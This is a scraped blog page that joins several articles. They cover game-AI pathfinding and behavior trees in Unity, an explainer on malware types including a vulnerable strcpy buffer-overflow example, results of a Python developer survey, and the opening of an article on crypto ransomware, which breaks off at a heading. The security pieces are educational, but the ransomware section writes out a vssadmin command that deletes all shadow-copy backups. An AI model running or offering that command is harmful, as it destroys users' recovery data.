While Dijkstra's algorithm is perfectly capable, variants of it have been developed that can solve the problem more efficiently. A* is one such algorithm, and it's one of the most widely used pathfinding algorithms in games, due to its speed advantage over Dijkstra's original version.

Using A* Pathfinding

There are many games in which you can find monsters or enemies that follow the player, or go to a particular point while avoiding obstacles. For example, take a typical RTS game. You can select a group of units and click on a location you want them to move to, or click on the enemy units to attack them. Your units then need to find a way to reach the goal without colliding with the obstacles, or avoiding them as intelligently as possible. The enemy units also need to be able to do the same. Obstacles can differ between units, terrain, and other in-game entities; for example, an air force unit may be able to pass over a mountain, while ground or artillery units need to find a way around it.

A* (pronounced "A star") is a pathfinding algorithm that is widely used in games because of its performance and accuracy. Let's take a look at an example to see how it works. Say we want our unit to move from point A to point B, but there's a wall in the way and it can't go straight towards the target, so it needs to find a way to get to point B while avoiding the wall.

In order to find the path from point A to point B, we need to know more about the map, such as the positions of the obstacles. To do this, we can split the whole map into small tiles, representing the map in a grid format. The tiles can also be other shapes, such as hexagons or triangles. Representing the whole map in a grid simplifies the search area, and this is an important step in pathfinding. We can now reference our map in a small 2D array.

Once our map is represented by a set of tiles, we can start searching for the best path to reach the target by calculating the movement score of each tile adjacent to the starting tile (a tile on the map not occupied by an obstacle), and then choosing the tile with the lowest cost. A* Pathfinding calculates the cost to move across the tiles; a minimal code sketch appears after the IDA* discussion below.

A* is an important pattern to know when it comes to pathfinding, but Unity also gives us a couple of features right out of the box, such as automatic Navigation Mesh generation and the NavMesh agent. These features make implementing pathfinding in your games a walk in the park (no pun intended). Whether you choose to implement your own A* solution or simply go with Unity's built-in NavMesh feature will depend on your project's needs. Each option has its own pros and cons, but ultimately, knowing about both will allow you to make the best possible choice. With that said, let's have a quick look at NavMesh.

IDA* Pathfinding

IDA* stands for iterative deepening A*. It is a depth-first permutation of A* with a lower overall memory cost, but it is generally considered costlier in terms of time. Whereas A* keeps multiple nodes in memory at a time, IDA* does not, since it is a depth-first search. For this reason, IDA* may visit the same node multiple times, leading to a higher time cost. Either solution will give you the shortest path between two nodes. In instances where the graph is too big for A* in terms of memory, IDA* is preferable, but it is generally accepted that A* is good enough for most use cases in games.
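As promised, here is a minimal illustrative Python sketch of A* on a tile grid (again not the book's C# code): it is essentially the Dijkstra loop from the previous sketch plus a Manhattan-distance heuristic, with 0 marking walkable tiles and 1 marking walls:

```python
import heapq

def astar(grid, start, goal):
    """Shortest path on a 2D grid of 0s (free) and 1s (walls), 4-way movement."""
    def h(cell):  # Manhattan-distance heuristic: estimated cost to the goal
        return abs(cell[0] - goal[0]) + abs(cell[1] - goal[1])

    frontier = [(h(start), 0, start, [start])]  # (f = g + h, g, cell, path)
    seen = set()
    while frontier:
        f, g, cell, path = heapq.heappop(frontier)  # lowest movement score first
        if cell == goal:
            return path
        if cell in seen:
            continue
        seen.add(cell)
        r, c = cell
        for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):
            if (0 <= nr < len(grid) and 0 <= nc < len(grid[0])
                    and grid[nr][nc] == 0 and (nr, nc) not in seen):
                heapq.heappush(frontier, (g + 1 + h((nr, nc)), g + 1,
                                          (nr, nc), path + [(nr, nc)]))
    return None  # no path exists

grid = [[0, 1, 0],
        [0, 1, 0],
        [0, 0, 0]]  # a wall separates A (top-left) from B (top-right)
print(astar(grid, (0, 0), (0, 2)))
# [(0, 0), (1, 0), (2, 0), (2, 1), (2, 2), (1, 2), (0, 2)]
```

The heuristic is what gives A* its speed advantage: tiles that lead away from the goal get higher movement scores and are explored last, while Dijkstra's version would expand outward in every direction equally.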
Using Navigation Mesh

Now that we've taken a brief look at A*, let's look at some scenarios where we might find a NavMesh a more fitting approach than calculating a grid. One thing you might notice is that using a simple grid in A* requires quite a number of computations to get a path that is the shortest to the target while avoiding obstacles. So, to make pathfinding cheaper and easier for AI characters, people came up with the idea of using waypoints as a guide to move AI characters from a start point to a target point. Say we want to move our AI character from point A to point B and we've set up three waypoints: all we have to do is pick the nearest waypoint and then follow its connected nodes leading to the target waypoint.

Most games use waypoints for pathfinding because they are simple and quite effective in terms of computational resources. However, they do have some issues. What if we want to update the obstacles in our map? We'll have to place waypoints for the updated map all over again. Having to manually alter waypoints every time the layout of your level changes can be cumbersome and very time-consuming. In addition, following each node to the target means the AI character moves in a series of straight lines from node to node, and where the path runs close to a wall, it's quite likely the AI character will collide with that wall. If that happens, our AI will keep trying to go through the wall to reach the next target, but it won't be able to and will get stuck there. Even though we can smooth out the path by transforming it into a spline and making adjustments to avoid such obstacles, the problem is that waypoints don't give us any information about the environment other than the spline connecting two nodes. What if our smoothed and adjusted path passes the edge of a cliff or a bridge? The new path might not be safe anymore. So, for our AI entities to be able to effectively traverse a whole level, we're going to need a tremendous number of waypoints, which will be really hard to implement and manage.

This is a situation where a NavMesh makes the most sense. A NavMesh is another graph structure that can be used to represent our world, similar to the way we did with our square tile-based grid or waypoints graph. A Navigation Mesh uses convex polygons to represent the areas of the map that an AI entity can travel to. The most important benefit of using a Navigation Mesh is that it gives a lot more information about the environment than a waypoint system; we can now adjust our path safely because we know the safe region in which our AI entities can travel. Another advantage is that we can use the same mesh for different types of AI entities. Different AI entities can have different properties, such as size, speed, and movement abilities; a set of waypoints tailored for humanoids may not work nicely for flying creatures or AI-controlled vehicles, which would need different sets of waypoints. Using a Navigation Mesh can save a lot of time in such cases.

Generating a Navigation Mesh programmatically based on a scene can be a somewhat complicated process. Fortunately, Unity 3.5 introduced a built-in Navigation Mesh generator as a pro-only feature, which has been included for free from the Unity 5 Personal Edition onwards.
Unity's implementation provides a lot of additional functionality out of the box: not just the generation of the NavMesh itself, but agent collision and pathfinding on the generated graph (via A*, of course) as well.

Flocking and crowd dynamics

In nature, we can observe what we refer to as flocking behavior in several species. Flocking simply refers to a group moving in unison. Schools of fish, flocks of sheep, and cicada swarms are fantastic examples of this behavior. Modeling this behavior using manual means, such as animation, can be very time-consuming and is not very dynamic. Similarly, crowds of humans, be it on foot or in vehicles, can be modeled by representing the entire crowd as an entity rather than trying to model each individual as its own agent. Each individual in the group only really needs to know where the group is heading and what its nearest neighbor is up to in order to function as part of the system.

Behavior trees

The behavior tree is another pattern used to represent and control the logic behind AI agents. Behavior trees have become popular for applications in AAA games such as Halo and Spore. Previously, we briefly covered FSMs, which provide a very simple yet efficient way to define the possible behaviors of an agent based on different states and the transitions between them. However, FSMs are considered difficult to scale, as they can get unwieldy fairly quickly and require a fair amount of manual setup. We need to add many states and hardwire many transitions in order to support all the scenarios we want our agent to consider, so we need a more scalable approach when dealing with large problems. This is where behavior trees come in.

Behavior trees are a collection of nodes organized in a hierarchical order, in which nodes are connected to parents rather than states connected to each other, resembling branches on a tree, hence the name. The basic elements of behavior trees are task nodes, whereas states are the main elements of FSMs. There are a few different task types, such as Sequence, Selector, Parallel, and Decorator, and it can be a bit daunting to track what they all do. The best way to understand them is to look at an example, breaking the guard's states and transitions down into tasks.

Consider a Selector task for this behavior tree, represented in the book's diagrams by a circle with a question mark inside. The selector will evaluate each child in order, from left to right. First, it'll choose to attack the player; if the Attack task returns a success, the Selector task is done and will go back to the parent node, if there is one. If the Attack task fails, it'll try the Chase task. If the Chase task fails, it'll try the Patrol task.

Sequence tasks, denoted by a rectangle with an arrow inside, work the other way around. The root selector may choose the first Sequence action. This Sequence action's first task is to check whether the player character is close enough to attack. If this task succeeds, it'll proceed with the next task, which is to attack the player. If the Attack task also returns successfully, the whole sequence returns a success, and the selector is done with this behavior and does not continue with other Sequence tasks. If the proximity-check task fails, the Sequence action does not proceed to the Attack task and returns a failed status to the parent selector task; the selector then chooses the next task in the sequence, Lost or Killed Player?
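As an illustrative sketch (the book builds its trees in C# within Unity), the selector and sequence logic just described can be expressed in a few lines of Python; the guard tasks here are hypothetical stand-ins that simply report success or failure:

```python
class Selector:
    """Succeeds as soon as any child succeeds; fails only if all children fail."""
    def __init__(self, *children):
        self.children = children
    def run(self):
        return any(child.run() for child in self.children)  # short-circuits

class Sequence:
    """Succeeds only if every child succeeds, evaluated left to right."""
    def __init__(self, *children):
        self.children = children
    def run(self):
        return all(child.run() for child in self.children)  # short-circuits

class Task:
    """Leaf node wrapping a condition or action callback."""
    def __init__(self, name, action):
        self.name, self.action = name, action
    def run(self):
        result = self.action()
        print(f"{self.name}: {'success' if result else 'failure'}")
        return result

# Hypothetical guard: the root selector tries the attack sequence,
# then chasing, then patrolling, exactly as described above.
root = Selector(
    Sequence(Task("Close enough to attack?", lambda: False),
             Task("Attack player", lambda: True)),
    Task("Chase player", lambda: False),
    Task("Patrol", lambda: True),
)
root.run()  # proximity check fails -> sequence fails -> chase fails -> patrol runs
```

Because selectors and sequences compose, adding a new behavior means attaching a new subtree rather than rewiring transitions, which is the scalability win over FSMs.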
The other two common components are Parallel tasks and Decorators. A Parallel task executes all of its child tasks at the same time, while Sequence and Selector tasks only execute their child tasks one by one. A Decorator is a type of task that has only one child; it can change the behavior of its child task, including whether to run it at all, how many times it should run, and so on.

Thinking with fuzzy logic

Finally, we arrive at fuzzy logic. Put simply, fuzzy logic refers to approximating outcomes as opposed to arriving at binary conclusions. We can use fuzzy logic and reasoning to add yet another layer of authenticity to our AI. Let's use a generic bad-guy soldier in a first-person shooter as our agent to illustrate the basic concept. Whether we are using a finite state machine or a behavior tree, our agent needs to make decisions: should I move to state x, y, or z? Will this task return true or false? Without fuzzy logic, we'd look at a binary value (true or false, 0 or 1) to determine the answers to those questions. For example, can our soldier see the player? That's a yes/no binary condition. However, if we abstract the decision-making process even further, we can make our soldier behave in much more interesting ways. Once we've determined that our soldier can see the player, the soldier can then "ask" itself whether it has enough ammo to kill the player, or enough health to survive being shot at, or whether there are other allies around to assist in taking the player down. Suddenly, our AI becomes much more interesting, unpredictable, and believable. This added layer of decision making is achieved by using fuzzy logic, which, in the simplest terms, boils down to taking the seemingly arbitrary or vague terminology that our wonderfully complex brains can easily assign meaning to, such as "hot" versus "warm" or "cool" versus "cold," and converting it to a set of values that a computer can easily understand.

Game AI and academic AI have different objectives. Academic AI researchers try to solve real-world problems and prove theories without much limitation in terms of resources, while game AI focuses on building NPCs, within limited resources, that seem intelligent to the player. The objective of AI in games is to provide a challenging opponent that makes the game more fun to play. To summarize, we learned briefly about the different AI techniques widely used in games, such as FSMs, sensor and input systems, flocking and crowd behaviors, and path following and steering behaviors.

If you enjoyed this excerpt, check out the book Unity 2017 Game AI Programming - Third Edition to explore brand-new features in Unity 2017 for easier Artificial Intelligence implementation in your games.

Read more:
How to create non-player Characters (NPC) with Unity 2018
Put your game face on! Unity 2018.1 is now available
Implementing lighting & camera effects in Unity 2018

12 common malware types you should know

Savia Lobo
24 May 2018
14 min read
Malware is software with malicious intent that changes the system without the knowledge of the user. Malware uses the same technologies that are used by genuine software, but the intent is bad. The following are some examples:

- Software such as TrueCrypt uses algorithms and techniques to encrypt a file to protect privacy, while ransomware uses the same algorithms to encrypt files to extort the user.
- Similarly, Firefox uses the HTTP protocol to browse the web, while malware uses the HTTP protocol to post its stolen data to its command and control (C&C) server.

In this article we will focus on the different types of malware. Malware can be categorized based on the damage it causes to the system, and it does not necessarily use a single method to cause damage; it can employ multiple ways. We will look into some known malware types:

- Backdoor
- Downloader
- Virus or file infector
- Worm
- Botnet
- Remote Access Tool (RAT)
- Hacktool
- Keylogger and password stealer
- Banking malware
- POS malware
- Ransomware
- Exploit and exploit kits

To be clear, a piece of malware can act as a backdoor as well as a password stealer, or can be a combination of any of them. Some of the definitions are simple enough to understand in one line, while others need some detailed explanation. This article is an excerpt taken from the book, 'Preventing Ransomware', written by Abhijit Mohanta, Mounir Hahad, and Kumaraguru Velmurugan.

Backdoor

A backdoor can be a simple piece of functionality in malware. It opens a port on the victim machine so that the hacker can log in without the victim's knowledge and carry out their work. A piece of backdoor malware can create a new process of itself, or inject malicious code that opens a port into legitimate code executing on the system. Backdoor activity is usually part of other malware; most RAT tools have a backdoor module that opens a port on the victim machine for the hacker to get in.

Downloader

A downloader is a piece of malicious software that downloads other malware. It carries a URL for the malware that needs to be downloaded and, when executed, fetches and runs it. Bedep was mostly known to download CryptoLockers. Upatre was another popular downloader.

Virus or file infector

File infection malware piggybacks its code on clean software. It alters an executable file on disk in such a way that the malware code is executed before or after the clean code in the file is executed. A file infector is often termed a virus in the security industry, and a lot of antivirus products tag it as a virus. In the context of Windows PE executables, a file infector can work in the following manner:

- The malware adds malicious code at the end of a clean executable file.
- It changes the entry point of the file to point to the malicious code located at the end.
- When the exe is double-clicked, the malware code is executed first.
- The malicious code keeps the address of the clean code, which was earlier the entry point. After completing the malicious activity, the malware code transfers control to the clean code.

A virus can infect a file in several ways, placing its code at different locations in the host file. File infection is a way to spread within the system. Many of these file infectors infect every system file on Windows, so the malware code executes irrespective of whether you start Internet Explorer or a calculator program. Some very famous PE file infectors are Virut, Sality, XPAJ, and Xpiro.

Worm

A worm spreads in a system by various mechanisms. File infection can also be considered worm-like behavior.
A worm can spread in several ways:

- To other computers on the network, by brute-forcing default usernames and passwords of network shares or other machines.
- By exploiting vulnerabilities in network protocols.
- Using pen drives. When an autorun worm is executed, it looks for a pen drive attached to the system. The worm creates a copy of itself on the pen drive and also adds an autorun.inf file to it. When an infected pen drive is inserted into a new machine, autorun.inf is executed by Windows, which in turn executes the copied .exe. The copied exe can then copy itself to different locations on the new machine.

Botnet

A botnet is a piece of malware that is based on the client-server model. The victim machine that is infected with the malware is called a bot. The hacker controls the bots by using a C&C server; such a hacker is also called a bot herder. A C&C server can issue commands to the bots. If a large number of computers are infected with bots, they can be used to direct a lot of traffic toward any server. If the server is not secure enough and is incapable of handling the huge traffic, it can shut down. This is usually called a denial of service (DoS) attack. A bot can use internet protocols or custom protocols to communicate with its C&C server. ZeroAccess and GameOver are famous botnets of the recent past.

Keylogger and password stealer

Keyloggers have been well known for a long time. They can monitor keystrokes and log them to a file, which can be transferred to the hacker later on. A password stealer is a similar thing. It can steal usernames and passwords from the following locations:

- Browsers, which store passwords for social networking sites, movie sites, song sites, email, and gaming sites
- FTP clients such as FileZilla and SmartFTP, which can be used by companies or individuals to save data on FTP servers
- Email clients such as Thunderbird and Outlook, which are used to access emails easily
- Database clients, used mostly by engineers and students
- Banking applications
- Password managers such as LastPass and KeePass, in which users store passwords so that they don't have to remember them

Hackers can use these credentials to steal more data, to access somebody's private information, or to try to access military installations. They can target executives using this kind of malware to steal their confidential information. Zeus and Citadel are famous password stealers.

Banking malware

Banking malware is financial malware. It can include keylogging and password-stealing functionality targeting the browser. Banks have come up with virtual keyboards, which are a major blow to keyloggers, so most banking malware now uses a man-in-the-middle (MITM) attack instead. In this kind of attack, a piece of malware is able to intercept the conversation between the victim and the banking site. There are two popular MITM mechanisms used by banking malware these days: form grabbing and browser injects (web injects). In form grabbing, the malware hooks the browser APIs and sends the intercepted data to its C&C server. Simultaneously, it can send the same data on to the bank website too.

A web inject works in the following manner:

- The malware performs API hooking in the browser to intercept the web page that was requested by the victim's browser.
- The original web page contains a form in which the victim needs to input various things, such as the amount they need to transfer, credentials, and so on.
- The malware modifies this intercepted web page to add extra fields, such as CVV number, PIN, and OTP, which are used for additional authentication. These additional fields are injected using an HTML form, and the form varies based on the bank. The malware keeps a configuration file that tells it which form needs to be injected into the page of which banking site.
- After modifying the web page, the malware sends the data to the victim's browser. The victim therefore sees the page with the extra fields added by the malware, and the malware is able to steal the additional parameters needed for authentication.

Tinba, Shifu, Carberp, and Zeus are some famous pieces of banking malware.

POS malware

The way money changes hands is changing: cash transactions in shops are giving way to card payments through the POS devices now installed in a lot of shops. Microsoft provides a dedicated Windows POS operating system for these kinds of devices. The POS software on these devices is able to read the credit card information when a card is swiped through the device. If malware infects a POS device, it scans the memory of the POS software for credit card patterns. Credit card numbers are 16 digits, so the malware scans for 16-digit patterns in memory to identify and then steal credit card numbers. BlackPOS, Dexter, JackPOS, and BackOff are famous pieces of POS malware.

Hacktool

Hacktools are often used to retrieve passwords from browsers, operating systems, or other applications, working by brute forcing or by identifying patterns. Cain and Abel, John the Ripper, and Rainbow Crack were old hacktools. Mimikatz is one of the latest hacktools, associated with top ransomware such as WannaCry and NotPetya, used to decode and steal the credentials of the victim.

RAT

A RAT acts as a remote control, as the name suggests. It can be used with both good and bad intentions. RATs can be used by system administrators to solve their clients' issues by accessing the client's machine remotely. But since RATs usually give full access to the person sitting remotely, they can be misused by hackers, and they have been used in sophisticated hacks many times. They can be misused for multiple purposes, such as the following:

- Monitoring keystrokes using keyloggers
- Stealing credentials and data from the victim machine
- Wiping out all data from a remote machine
- Creating a backdoor so that a hacker can log in

Gh0st RAT, Poison Ivy, Back Orifice, ProRat, and NjRat are well-known RATs.

Exploit

Software is written by humans and, obviously, there will be bugs. Hackers take advantage of some of these bugs to compromise a system in an unauthorized manner. We call such bugs vulnerabilities. Vulnerabilities occur for various reasons, but mostly due to imperfect programming; if programmers have not considered certain scenarios while writing the software, this can lead to a vulnerability. Consider a simple C program that uses the function strcpy() to copy a string from a source buffer to a destination buffer. The programmer has failed to notice that the destination is assigned only 11 bytes of memory space (room for 10 characters plus the terminating null), while the source needs 23 bytes. When the strcpy() function copies the source into the destination, the copied string goes beyond the allocated memory of the destination. The memory beyond the space assigned to the destination can hold important program data, which would be overwritten. This kind of vulnerability is called a buffer overflow.
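The screenshot of that program is missing from this excerpt; the following is a hedged reconstruction of what it likely showed, based on the byte sizes described above (the variable names and the exact string are assumptions):

```c
#include <stdio.h>
#include <string.h>

int main(void)
{
    /* 23 bytes: 22 characters plus the terminating null */
    char *source = "This is a long string!";
    /* only 11 bytes: room for 10 characters plus the null */
    char destination[11];

    /* No bounds check: the extra bytes of source overwrite whatever
       sits in memory beyond destination - a buffer overflow. */
    strcpy(destination, source);
    printf("%s\n", destination);
    return 0;
}
```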
Stack overflows and heap overflows are the commonly known buffer overflow vulnerabilities. There are other vulnerabilities too, such as use-after-free, where an object is used after it has been freed (we won't go into this in depth, as it requires an understanding of C++ programming concepts and assembly language). A program that takes advantage of these vulnerabilities for a malicious purpose is called an exploit.

To explain an exploit, we will talk about a stack overflow case. Readers are encouraged to read about C programming to follow this fully. Exploit writing is a more complex process, requiring knowledge of assembly language, debuggers, and computer architecture; we will try to explain the concept as simply as possible. Consider a C program in which the main() function takes input from the user (argv[1]) and then passes it on to a vulnerable function, vulnerable_function (a hedged reconstruction of this program is shown at the end of this section; it is not a complete program and is only meant to illustrate the concept). The main function calls the vulnerable function, so after executing the vulnerable function, the CPU should come back to the main function (that is, line no 15). This is how the CPU should execute the program: line 14 | line 4 | line 5 | line 6 | line 15.

Now, when the CPU is at line 6, how does it know that it has to return to line 15 after that? Well, the secret lies in the stack. Before getting into line 4 from line 14, the CPU saves the address of line 15 on the stack. We can call the address of line 15 the return address. The stack is also meant for storing local variables; in this case, buffer is a local variable in vulnerable_function. While the CPU is executing the vulnerable_function code, the return address (the address of line 15) sits on the stack just beyond the local buffer.

Now, the size of the buffer is only 16 bytes (see the program). When the user provides an input (argv[1]) that is larger than 16 bytes, the extra length of the input will overwrite the return address when strcpy() is executed. This is a classic example of stack overflow. When exploiting a similar program, the exploit will overwrite the return address; as a result, after executing line 6, the CPU will go to whatever address has overwritten the return address. So the attacker can create a specially crafted input (argv[1]) with a length greater than 16 bytes. The input contains three parts: the address of the buffer, NOPs, and shellcode. The address of the buffer is the virtual memory address of the variable buffer. NOP stands for no-operation instruction; as the name implies, it does nothing when executed. Shellcode is an extremely small piece of code that can fit in a very small space. Shellcode is capable of doing the following:

- Opening a backdoor port in the vulnerable software
- Downloading another piece of malware
- Spawning a command prompt for the remote hacker, who can then access the victim's system
- Elevating privileges, so the hacker has access to more areas and functions in the system

After the specially crafted input is provided to the program, the return address on the stack is overwritten with the address of the buffer, so instead of line 15, the CPU will go to the address of the buffer.
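For reference, here is a hedged reconstruction of the vulnerable program discussed above. The original screenshot is missing, so the exact code and padding are assumptions, arranged (with the listing's line numbers shown) so that the line numbers referenced in the text, 4 through 6 and 14 through 15, line up:

```c
 1  #include <stdio.h>
 2  #include <string.h>
 3
 4  void vulnerable_function(char *input) {
 5      char buffer[16];          /* local buffer on the stack */
 6      strcpy(buffer, input);    /* overflows if input > 16 bytes */
 7  }
 8
 9  /* ... */
10
11
12
13  int main(int argc, char *argv[]) {
14      vulnerable_function(argv[1]);
15      return 0;                 /* the saved return address points here */
16  }
```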
After the NOPs, the shellcode is executed. The final conclusion is that, by providing a crafted input to the vulnerable program, the exploit is able to execute shellcode, which can open up a backdoor or download malware. The input can take many forms:

- An HTTP request is an input for a web server
- An HTML page is an input for a web browser
- A PDF is an input for Adobe Reader

And so on; the list is infinite. You can explore these using the keywords provided, as the topic cannot be explained in a few lines and goes beyond the scope of this book.

We often see vulnerabilities mentioned in blogs, usually with a CVE number. One can find the list of vulnerabilities at http://www.cvedetails.com/. The WannaCry ransomware used CVE-2017-0144. 2017 is the year when the vulnerability was discovered, and 0144 denotes that this was the 144th vulnerability discovered in 2017. Microsoft also issues advisories for vulnerabilities in Microsoft software. https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144 gives the details of the vulnerability; the description tells us that the bug lies in the SMBv1 server software installed in some Microsoft operating system versions. The URL also refers to some of the exploits.

Now that you know what types of malware exist, do check out the book, Preventing Ransomware, to further your knowledge of the techniques to prevent malware and perform effective malware analysis.

IoT Forensics: Security in an always-connected world where things talk
Top 5 penetration testing tools for ethical hackers
Top 5 cloud security threats to look out for in 2018

What the Python Software Foundation & Jetbrains 2017 Python Developer Survey had to reveal

Aaron Lazar
24 May 2018
7 min read
The Python Software Foundation, together with JetBrains, conducts a developer survey every year; at the end of 2017, over 9,500 developers from all over the world participated in this insightful Python developer survey. The learnings are pretty interesting and so, I thought I'd quickly summarise the most relevant points here. So here we go.

TL;DR:

- Adoption of Python 3 is growing rapidly, but 25% of developers are yet to migrate to Python 3 despite the closely looming deadline (1st of Jan, 2020).
- There are as many Python developers doing primarily data science as there are those focused on web development. This is quite different from the 2016 findings, where there was a difference of 17% between web and data.
- A majority of Python developers use JavaScript, HTML/CSS, and SQL along with Python.
- Django, pandas, NumPy, and Matplotlib are the most popular Python frameworks and libraries.
- Jupyter Notebook and Docker are the most popular technologies used along with Python. Among cloud platforms, AWS is the most popular.
- Both editions of PyCharm (Community and Professional) are the most popular tools for Python development, followed by Sublime Text.
- Code autocompletion, code refactorings, and writing unit tests are the most widely used development features.
- More than half the respondents had a full-time job working with Python.
- A majority of respondents held the role of a Developer/Programmer and belonged to the age group 21-39.
- Most of the developers are located in the US, India, and China.

The above stats are quite interesting, no doubt. This got me thinking about the why behind those numbers. Here's my perspective on some of those findings. I would love to hear yours in the comments section below.

How is Python being used?

Starting with the usage of Python, the survey revealed that close to 80% of the respondents used Python as their primary language for development. When asked which languages they generally used it with, the top responses were JavaScript, HTML/CSS, and SQL. On the other hand, a lot of Java developers and those using Bash/shell seem to use Python as their secondary language. This shows that Python is quite interoperable with a number of other languages, making it versatile for web, enterprise, and server-side scripting.

Now, when it comes to what tasks Python is used for in day-to-day development, it wasn't a surprise when respondents mentioned data analysis. More than 50% use Python as their primary language for data analysis; however, only 32% claimed that they used it for machine learning. On the other hand, 54% mentioned that they used it for web development, and 36% responded that they used Python for DevOps and system administration purposes. This isn't surprising, as most developers tend to stick to a particular tool or stack as far as possible. Developers also responded that they used Python the most for web development, with machine learning and data analysis close on its heels. Most DevOps engineers and sysadmins use Python as their secondary language; that might be because shell/bash are their primary languages. In the 2016 survey, the percentage of web developers was much higher than that of ML/data analysts, but the difference has reduced greatly.

What roles do these developers hold?

When asked what roles these developers hold, the responses were quite interesting! While nearly a quarter were in a combination of data analysis and machine learning roles, another quarter were in a combination of data analysis and web development!
15% claimed to be in web development and machine learning. This relationship, although seemingly unlikely, is extremely interesting and worth exploring further. One reason could be that developers are building machine learning solutions that are offered to customers as web applications, rather than as desktop applications. Another reason could be that a lot of web apps these days are becoming more data-driven and require some kind of machine learning component running under the hood.

What version of Python are developers rolling with, and what tools do they use it with?

A very surprising fact that surfaced from the survey was that 25% of developers still haven't migrated their codebases to Python 3 and are still working with Python 2. This is quite astonishing, since support for Python 2 will be discontinued in less than two years (on Jan 1, 2020, to be precise). Although the adoption of Python 3 has been growing steadily over the years, most of the developers who were still using Python 2 turned out to be web developers. This may be because data scientists moved to Python quite recently, compared to web developers, who might have been using Python for a long time and hence haven't migrated their legacy code.

What is their preferred tool set with Python?

When asked about the tools that developers used, the web developers responded that a majority of them used Django (76%), while 53% used Requests and 49% used Flask. When it came to GUI frameworks, 9% of developers used PyQt / PyGTK / wxPython, while 6% used Tkinter. 29% of these developers mentioned that they used scientific libraries like NumPy / pandas / Matplotlib / SciPy, which supports the overlap between the web development and data science roles. The data scientists, on the other hand, responded that 65% used NumPy / pandas / Matplotlib / SciPy, 38% used Keras / Theano / TensorFlow / scikit-learn, while 31% and 27% used Django and Flask, respectively. Django was a clear winner in the tools section, with an overall 41% of developers using it.

When asked about what tools they used along with Python, the web developers responded that 47% used Docker, 46% used an ORM like SQLAlchemy or PonyORM, and 40% used Redis; 27% of them used Jupyter Notebook. The data scientists, on the other hand, used Jupyter Notebook a lot (52%), while 40% of them used Anaconda and 23% Docker. Of the various cloud platforms, developers chose AWS the most (65%).

When it came to the Python development features that were used the most, code autocompletion (84%), code refactorings (82%), and writing unit tests (81%) made the top of the list. 75% of developers used SQL databases, while only 46% used NoSQL. Of the various IDEs and editors, PyCharm, in both its Community and Professional editions, was the most popular, closely tailed by Sublime Text, Vim, IDLE, Atom, and VS Code. While web developers preferred PyCharm, data scientists prefer Jupyter Notebook.

Developer profile: employment, job roles, and experience

Unsurprisingly, 52% of Python developers claimed that they were in a full-time job. This ties in well with the 2018 Stack Overflow Developer Survey, which labeled Python as the "most wanted" programming language. So, developers out there, if you're well versed in Python, you're more likely to be hired. Talking about job roles, 73% held the role of a Developer/Programmer, while 19% held the role of a Data Analyst and 18% an Architect. Interestingly, 7% of them held the role of a CIO / CEO / CTO.
In terms of years of experience, the results were well balanced, with almost as many developers having more than 5 years of experience as those with less than 5 years. 67% of the respondents were in the age group of 21-39, meaning that a majority of young folk seem to be using Python. If you're one of them and are looking to progress in your career, check out our extensive catalog of Python titles. As for the geographic location of the developers, 18% were from the US, while 13% were from India and 7% from China.

Should you move to Python 3? 7 Python experts' opinions
Python experts talk Python on Twitter: Q&A Recap
Introducing Dask: The library that makes scalable analytics in Python easier

Anatomy of a Crypto Ransomware

Savia Lobo
23 May 2018
7 min read
Crypto ransomware is the worst threat at present. There are a lot of variants of crypto ransomware; only some make it into the limelight, while others fade away. In this article, you will get to know about crypto ransomware and how easily it can be coded to encrypt certain directories and important files. One possible reason for the increase in the use of crypto ransomware is that coding it is quite easy compared to other malware. The malware just needs to browse through user directories to find relevant files that are likely to be personal and encrypt them. The malware author need not write complex code, such as hooks to steal data. Most crypto ransomware doesn't care about hiding in the system, so most don't have rootkit components either. They only need to execute on the system once to encrypt all files. Some crypto ransomware also checks to see whether the system is already infected by other crypto ransomware.

There is a huge list of crypto ransomware. Here are a few of them:

- Locky
- Cerber
- CryptoLocker
- Petya

This article is an excerpt taken from the book, 'Preventing Ransomware', written by Abhijit Mohanta, Mounir Hahad, and Kumaraguru Velmurugan.

How does crypto ransomware work?

Crypto ransomware technically does the following things:

- Finds files on the local system. On a Windows machine, it can use the FindFirstFile() and FindNextFile() APIs to enumerate files and directories. A lot of ransomware also searches for files present on shared drives.
- Checks for the file extensions that it needs to encrypt. Most have a hardcoded list of file extensions that the ransomware should encrypt. Even if it encrypts executables, it should not encrypt any of the system executables.
- Makes sure that you are not able to restore the files from backup, by deleting the backups. Sometimes this is done using the vssadmin tool. A lot of crypto ransomware uses the vssadmin command, provided by Windows, to delete shadow copies (commonly with an invocation such as vssadmin delete shadows /all /quiet). Shadow copies are backups of files and volumes. The vssadmin (VSS administration) tool is used to manage shadow copies; VSS is the abbreviation of Volume Shadow Copy, also termed the Volume Snapshot Service.
- After encrypting the files, the ransomware leaves a note for the victim. It is often termed a ransom note and is a message from the ransomware to the victim. It usually informs the victim that the files on their system have been encrypted and that, to decrypt them, a ransom needs to be paid. The ransom note instructs the victim on how to pay the ransom.

The ransomware uses a few cryptographic techniques to encrypt files, communicate with the C&C server, and so on. We will explain this with an example in the next section. But before that, it's important to take a look at the basics of cryptography.

Overview of cryptography

A lot of cryptographic algorithms are used by malware today. Cryptography is a huge subject in itself, and this section just gives a brief overview of it. Malware can use cryptography for the following purposes:

- To obfuscate its own code so that antivirus software or security researchers cannot identify the actual code easily
- To communicate with its own C&C server, sometimes to send hidden commands across the network and sometimes to infiltrate and steal data
- To encrypt the files on the victim machine

A cryptographic system can have the following components:

- Plaintext
- Encryption key
- Ciphertext, which is the encrypted text
- Encryption algorithm, also called a cipher
- Decryption algorithm

There are two types of cryptographic algorithms, based on the kind of key used:

- Symmetric
- Asymmetric

A few assumptions before explaining the algorithms: the sender is the person who sends the data after encrypting it, and the receiver is the person who decrypts the data with a key.

Symmetric key

In symmetric key encryption, the same key, also called the secret key, is used by both sender and receiver. The sender uses the key to encrypt the data, while the receiver uses the same key to decrypt it. The following algorithms use a symmetric key:

- RC4
- AES
- DES
- 3DES
- Blowfish

Asymmetric key

A symmetric key is simpler to implement, but it faces the problem of exchanging the key in a secure manner. Public-key or asymmetric cryptography overcomes the key exchange problem by using a pair of keys: public and private. A public key can be distributed in an unsecured manner, while the private key is always kept secret by the owner. Either of the keys can be used to encrypt, and the other can then be used to decrypt. The most popular algorithms here are:

- RSA
- Diffie-Hellman
- ECC
- DSA

Secure protocols such as SSH have been implemented using public keys.

How does ransomware use cryptography?

